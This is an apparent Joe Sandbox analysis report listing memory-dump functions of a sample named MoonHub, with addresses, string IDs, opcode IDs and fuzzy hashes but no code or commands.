                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Pa=j$Xa=j
                                                                                                                                                                                • API String ID: 0-1554240053
                                                                                                                                                                                • Opcode ID: 887b219de7f699b6be48994da607737d8dfad7447c5b023438227ba0b149989a
                                                                                                                                                                                • Instruction ID: d332a8f238b345f27711b0c6e97c9885ee53d8cd7e270a72b52f4b39f57be9cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 887b219de7f699b6be48994da607737d8dfad7447c5b023438227ba0b149989a
                                                                                                                                                                                • Instruction Fuzzy Hash: 27915531D0DB894FE752B77858151FA7BF0FF46790F0801BAD59CC71D2EA28580A8786
                                                                                                                                                                                Function 00007FF848EA964D Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0'jj$x6=j
                                                                                                                                                                                • API String ID: 0-3229735113
                                                                                                                                                                                • Opcode ID: 6500401bf0b31565d508f17172e1d28e0dacad828281a2bc83988870e093f595
                                                                                                                                                                                • Instruction ID: df22ef81efc5f7d2e53a1971156e82d00d4e29cfa406e7407e630978a4a177d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 6500401bf0b31565d508f17172e1d28e0dacad828281a2bc83988870e093f595
                                                                                                                                                                                • Instruction Fuzzy Hash: ADA18F30A1CA198FDB98EB2CC855AB877E1FF59344F1001A9D44ACB2A2DF35EC46CB45
                                                                                                                                                                                Function 00007FF848E90E30 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @c=j$yR_H
                                                                                                                                                                                • API String ID: 0-240012394
                                                                                                                                                                                • Opcode ID: 56d4747e45da0e1d75def8bda52393bb252f248e1aa895986cbea6dc5eca8417
                                                                                                                                                                                • Instruction ID: 933b407e888156d4ab4c16e387a08c9a00b23165300be8e3aea3c3d10353f810
                                                                                                                                                                                • Opcode Fuzzy Hash: 56d4747e45da0e1d75def8bda52393bb252f248e1aa895986cbea6dc5eca8417
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B91E331E1CA094FEBA4EB6C98456B9B7E1FF99790F04027AD05ED3286DF34AC424785
                                                                                                                                                                                Function 00007FF848E98285 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^$x6=j
                                                                                                                                                                                • API String ID: 0-2406459750
                                                                                                                                                                                • Opcode ID: f49f1b13ec2ac019909535b1a96642d7be992e1323a12bb0a1d8ecebbebc7705
                                                                                                                                                                                • Instruction ID: 38c377e576ada9764906e5502cd9ba15d74e010f91f89b0fc9cc62fe188714b1
                                                                                                                                                                                • Opcode Fuzzy Hash: f49f1b13ec2ac019909535b1a96642d7be992e1323a12bb0a1d8ecebbebc7705
                                                                                                                                                                                • Instruction Fuzzy Hash: 7591263190E6D91FE366A67448161F97FA0EF43264F0901FBD48DCB1E3DA6C680B8796
                                                                                                                                                                                Function 00007FF848EA4B39 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8`=j$8`=j
                                                                                                                                                                                • API String ID: 0-1297509411
                                                                                                                                                                                • Opcode ID: b63168451e6c450cb8b36a1fe4efbb7876e21c43ff45eca208f3a073ec4da11e
                                                                                                                                                                                • Instruction ID: 2d51d205d4140bf7683773843f0da8ee99f12a2ea365589dc0d4d2a5da540c95
                                                                                                                                                                                • Opcode Fuzzy Hash: b63168451e6c450cb8b36a1fe4efbb7876e21c43ff45eca208f3a073ec4da11e
                                                                                                                                                                                • Instruction Fuzzy Hash: 47411630A0DB4A9FD788EF7C8455AA677D1FF99355B1044BDD00AC72D2DE3898468B50
                                                                                                                                                                                Function 00007FF848E92E19 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0c=j$8c=j
                                                                                                                                                                                • API String ID: 0-2051504001
                                                                                                                                                                                • Opcode ID: b0be47e8b1adfd3c55c4d6d32e8492a8b3c464a1e5afe75b30bbc93b82efa189
                                                                                                                                                                                • Instruction ID: 815878661ad4daef3496a601502f76b59ec73bab10ea0e0a8e8b43a53b2c07c1
                                                                                                                                                                                • Opcode Fuzzy Hash: b0be47e8b1adfd3c55c4d6d32e8492a8b3c464a1e5afe75b30bbc93b82efa189
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B113A2180EBC52FD71AA6780C1A5A67FE0DF53150F0901FEE488C71E3ED6868058352
                                                                                                                                                                                Function 00007FF848E93E4D Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8\=j$6=j
                                                                                                                                                                                • API String ID: 0-2186609157
                                                                                                                                                                                • Opcode ID: b342c8bc75966e6b1246516437fe57b131efcc8ab87ed96c4844bc263047cdcf
                                                                                                                                                                                • Instruction ID: a0393837b5c9d376163731d5d237094a2766c2c29488b2c198d005f4a13dc912
                                                                                                                                                                                • Opcode Fuzzy Hash: b342c8bc75966e6b1246516437fe57b131efcc8ab87ed96c4844bc263047cdcf
                                                                                                                                                                                • Instruction Fuzzy Hash: F321CD2194E7961FE3A2ABBC58661AA7FD0DF13254F0904FFD085CB1A3E99C484A8356
                                                                                                                                                                                Function 00007FF848E90E45 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0c=j$8c=j
                                                                                                                                                                                • API String ID: 0-2051504001
                                                                                                                                                                                • Opcode ID: ac8b8b80054ba0bbb4de472c3d4c076b04f32fe316799e852540e1311699213f
                                                                                                                                                                                • Instruction ID: 06e052688c2c727bf7a6878e28b9af1fd4f1ae1318f174bbc5c48754cc012401
                                                                                                                                                                                • Opcode Fuzzy Hash: ac8b8b80054ba0bbb4de472c3d4c076b04f32fe316799e852540e1311699213f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0401F52191EA487FE718B17C481B5FB7AD5DF57650F0801BEF84AC31A3EDA86C064296
                                                                                                                                                                                Function 00007FF848E93E80 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8\=j$6=j
                                                                                                                                                                                • API String ID: 0-2186609157
                                                                                                                                                                                • Opcode ID: bff18369e5734c7187d02e5d8009240277f37cd3daa4f7d7ee67d67f75601f77
                                                                                                                                                                                • Instruction ID: aa575ba9eeccb632ac0482ff8979d950ef004a8a434b32e8de11feff841812bd
                                                                                                                                                                                • Opcode Fuzzy Hash: bff18369e5734c7187d02e5d8009240277f37cd3daa4f7d7ee67d67f75601f77
                                                                                                                                                                                • Instruction Fuzzy Hash: F3014E2191F65A1FE391F7BC58562FA7AC0DF06264F0404BEE449C71E2ED5C4C46435A
                                                                                                                                                                                Function 00007FF848EEC988 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FF_H
                                                                                                                                                                                • API String ID: 0-2919801270
                                                                                                                                                                                • Opcode ID: 957b4e3ddac9be1c190a9c91ac173f113d690b899960390fcf61829c98e514f7
                                                                                                                                                                                • Instruction ID: 3cc31e9f881f0d33ad3586ffa8d663846bff5b75b5b951410fdcac95d442b73c
                                                                                                                                                                                • Opcode Fuzzy Hash: 957b4e3ddac9be1c190a9c91ac173f113d690b899960390fcf61829c98e514f7
                                                                                                                                                                                • Instruction Fuzzy Hash: CD221731A0CB864FE74AEB2888616757BE1FF56340F1941FAD489C71D3DE28AC06C796
                                                                                                                                                                                Function 00007FF848EC7750 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: d
                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                • Opcode ID: 0133172aed5ac58d00055667c5c875c5ddffd925edf8252c5609daeb2e31e35d
                                                                                                                                                                                • Instruction ID: 39e7f2b44ace208b198d2d14e4d6ba936b228b16351cc13a3c5f13bd1f0e9981
                                                                                                                                                                                • Opcode Fuzzy Hash: 0133172aed5ac58d00055667c5c875c5ddffd925edf8252c5609daeb2e31e35d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A02BF30A1CA4A8FD768EB18C485AB6B7E1FB95354F14457DC08EC3696DB35F882C781
                                                                                                                                                                                Function 00007FF848ED9A70 Relevance: 1.7, Strings: 1, Instructions: 478COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: OG_H
                                                                                                                                                                                • API String ID: 0-3535963147
                                                                                                                                                                                • Opcode ID: 9a5af04249a5b412dc2f6b7b0a066f8b2a5bc3917f20cf8c8a13a4013a304649
                                                                                                                                                                                • Instruction ID: 67a14b02141df653f316e816b70f1306a074b7306a68b9a3589ccaab16f37a25
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5af04249a5b412dc2f6b7b0a066f8b2a5bc3917f20cf8c8a13a4013a304649
                                                                                                                                                                                • Instruction Fuzzy Hash: A1E15F30A0C94B8FDA98EA18D494AB573E2FF99354F5441B9C00DCB296DF39EC86CB45
                                                                                                                                                                                Function 00007FF848E93EF9 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6=j
                                                                                                                                                                                • API String ID: 0-3426113708
                                                                                                                                                                                • Opcode ID: 26c7cbeb7b42c2cb6297bf7d8cf86f2d09664b38b405973141cc5fe1636a18a1
                                                                                                                                                                                • Instruction ID: d621668896e9fda5a4efc8b7c6971614b92657256302764a2b517eb272425cb5
                                                                                                                                                                                • Opcode Fuzzy Hash: 26c7cbeb7b42c2cb6297bf7d8cf86f2d09664b38b405973141cc5fe1636a18a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC12731A0C68A8FEB94EB6888552F97BE1FF5A358F0401BAD44DC72D2DF785806C741
                                                                                                                                                                                Function 00007FF848EACF34 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: _
                                                                                                                                                                                • API String ID: 0-701932520
                                                                                                                                                                                • Opcode ID: e70d79114df5cf4a3e243becb1a46e716e70e0a1cdd736ce679bb3bba0b0ae24
                                                                                                                                                                                • Instruction ID: 01111087befbdb4577c761b949d539715eba0b60cdb8efea5926849ae4813ce8
                                                                                                                                                                                • Opcode Fuzzy Hash: e70d79114df5cf4a3e243becb1a46e716e70e0a1cdd736ce679bb3bba0b0ae24
                                                                                                                                                                                • Instruction Fuzzy Hash: 55A14071A2CE458FDB98FF18D0819A573E1FFA8740B1441ADE00AC76A6DF35F8468B85
                                                                                                                                                                                Function 00007FF848EA6A34 Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-2751924910
                                                                                                                                                                                • Opcode ID: 9e3f125d3ce872cafde3c641ef33e59b9112ff015e8bf94071bd0453323ca40f
                                                                                                                                                                                • Instruction ID: 945036f81a9899f07d9cc05dfbbbfb00ab798ee6735bb3bcb4d863a8b1cd08a4
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3f125d3ce872cafde3c641ef33e59b9112ff015e8bf94071bd0453323ca40f
                                                                                                                                                                                • Instruction Fuzzy Hash: A991053184E7C99FE752A7744C255E57FE0EF47760F0901FAD488CB0A3DA2C990A8756
                                                                                                                                                                                Function 00007FF848EAB778 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0@H
                                                                                                                                                                                • API String ID: 0-2218331987
                                                                                                                                                                                • Opcode ID: 7241adfe0423acfec4e48f23ca0d238c3f4b42da28767513e71a726785214d73
                                                                                                                                                                                • Instruction ID: 11bb450d371bbf8dff16972968fa4f9865b9dabfafd32fcab15b2060f9a25ff8
                                                                                                                                                                                • Opcode Fuzzy Hash: 7241adfe0423acfec4e48f23ca0d238c3f4b42da28767513e71a726785214d73
                                                                                                                                                                                • Instruction Fuzzy Hash: 99914831A28A1D9FDB94EF6CD888EA977E1FF68350F0401A5E41ED7265DB34E841CB40
                                                                                                                                                                                Function 00007FF848E90E40 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Pc=j
                                                                                                                                                                                • API String ID: 0-1733780799
                                                                                                                                                                                • Opcode ID: 2fead45f5483ea88087f7832496a76e83a646f88283d62e5b0b85af037eea89c
                                                                                                                                                                                • Instruction ID: e402ce7671d0a6fe7f58e6ce75311463cd977d18d6e5b0a00d8c0a20bc79b288
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fead45f5483ea88087f7832496a76e83a646f88283d62e5b0b85af037eea89c
                                                                                                                                                                                • Instruction Fuzzy Hash: D2812431E1CE094FDB98EB6C98456B9B7E1FF98391F04427AD01ED3296DF74A8428780
                                                                                                                                                                                Function 00007FF848EA3BCD Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `=j
                                                                                                                                                                                • API String ID: 0-237927418
                                                                                                                                                                                • Opcode ID: cd9f47e9b348058c473a45cad92a29056c63e71cbedc55252faeaa2cf6a7ee0f
                                                                                                                                                                                • Instruction ID: 54b009d8c70c67e1a4ee8879769ae54ccde01b2220474faeb2e25ac9e0806642
                                                                                                                                                                                • Opcode Fuzzy Hash: cd9f47e9b348058c473a45cad92a29056c63e71cbedc55252faeaa2cf6a7ee0f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3581073190D7C95FE762A77898155EABFE0FF46750F0901FBD488CB093DA2C190A8796
                                                                                                                                                                                Function 00007FF848EA814D Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: a=j
                                                                                                                                                                                • API String ID: 0-267129293
                                                                                                                                                                                • Opcode ID: e03909eae344bfff9972482a6a55c302b8701210eb3dbc6a72e759aa22e4946f
                                                                                                                                                                                • Instruction ID: 9319a3c1900be4ec271d093b46a105f34f9748cc5e128e6adff29cfde63917cf
                                                                                                                                                                                • Opcode Fuzzy Hash: e03909eae344bfff9972482a6a55c302b8701210eb3dbc6a72e759aa22e4946f
                                                                                                                                                                                • Instruction Fuzzy Hash: 2881223680DB995FE766A73458251F97FE0FF56790F0901FBD488CB093EA28190B8792
                                                                                                                                                                                Function 00007FF848E9BE71 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: fc7f55ab5612f1a16430fd7c8b1b1652793e63532535fe796a7b82b421d24afd
                                                                                                                                                                                • Instruction ID: d41e94112c2e149cb832e5775ac92b2d66db634393dd33d0eeb68a1ceed56bff
                                                                                                                                                                                • Opcode Fuzzy Hash: fc7f55ab5612f1a16430fd7c8b1b1652793e63532535fe796a7b82b421d24afd
                                                                                                                                                                                • Instruction Fuzzy Hash: E1915E30918A4E8FDB89EF58C894AEEB3B1FF54344F540579D81AC7296DF79A842CB40
                                                                                                                                                                                Function 00007FF848EABBF8 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H_H
                                                                                                                                                                                • API String ID: 0-284316983
                                                                                                                                                                                • Opcode ID: e7594dbf309a3f3fc6d7c7886484ce7b1e44e8792c3d150dcf93bdd557647842
                                                                                                                                                                                • Instruction ID: da4cff145a4f162d4a8dc649fefeaa27bb471a7ff87f4f6526fc81969bb4375f
                                                                                                                                                                                • Opcode Fuzzy Hash: e7594dbf309a3f3fc6d7c7886484ce7b1e44e8792c3d150dcf93bdd557647842
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E61D621E1C98B5FEB58EA6894546B437D2FF59390F1841BAD80DC72C7CF38A84A8B45
                                                                                                                                                                                Function 00007FF848EAD25D Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: PJ_H
                                                                                                                                                                                • API String ID: 0-3529527441
                                                                                                                                                                                • Opcode ID: bc4ab94a25a5e89e4bccab0817e76dcda3615ac5762710987e2bc4a0c33dee54
                                                                                                                                                                                • Instruction ID: 50fee807056fbcef62ec406a7ede1374d91a7993a469fce1be33c1cd7d198615
                                                                                                                                                                                • Opcode Fuzzy Hash: bc4ab94a25a5e89e4bccab0817e76dcda3615ac5762710987e2bc4a0c33dee54
                                                                                                                                                                                • Instruction Fuzzy Hash: 58812770A0DB8A5FE782B76844662AA7BE1FF56750F0800FAD049CB193DE2CA846C755
                                                                                                                                                                                Function 00007FF848EAB7AD Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: x6=j
                                                                                                                                                                                • API String ID: 0-1755713205
                                                                                                                                                                                • Opcode ID: fbf8b8b13ec354b59b8031c367616ae3cc42927020987bf5fbcda4947be6beab
                                                                                                                                                                                • Instruction ID: 6bd7dd63822291db140dfb29eeb46a5de867e5df33dd5ad34a6709cbf843b869
                                                                                                                                                                                • Opcode Fuzzy Hash: fbf8b8b13ec354b59b8031c367616ae3cc42927020987bf5fbcda4947be6beab
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F51463070CA0A5FE758BB2C98559BA37D4FF95364B4801BDD44AC71A3EF25EC478688
                                                                                                                                                                                Function 00007FF848E99E48 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j
                                                                                                                                                                                • API String ID: 0-638611851
                                                                                                                                                                                • Opcode ID: b6039d92fb5a875fd6e5adc16abc2d8f7ae17e8efa6e67b34c7c94dc97ccb21b
                                                                                                                                                                                • Instruction ID: 5c75a871336d2ffdd34d04e01176be42435ed6496717b14e8052fc988b2e9934
                                                                                                                                                                                • Opcode Fuzzy Hash: b6039d92fb5a875fd6e5adc16abc2d8f7ae17e8efa6e67b34c7c94dc97ccb21b
                                                                                                                                                                                • Instruction Fuzzy Hash: 9651A560B2DD566FE68CB76C9412BAAF3D1FF49740F648175D00DC3282CE68BC118796
                                                                                                                                                                                Function 00007FF848E94068 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6=j
                                                                                                                                                                                • API String ID: 0-3426113708
                                                                                                                                                                                • Opcode ID: 006768cd3673fd90fd1d954dd901fb5696eeac4c02a2a620e15369acb66b32f2
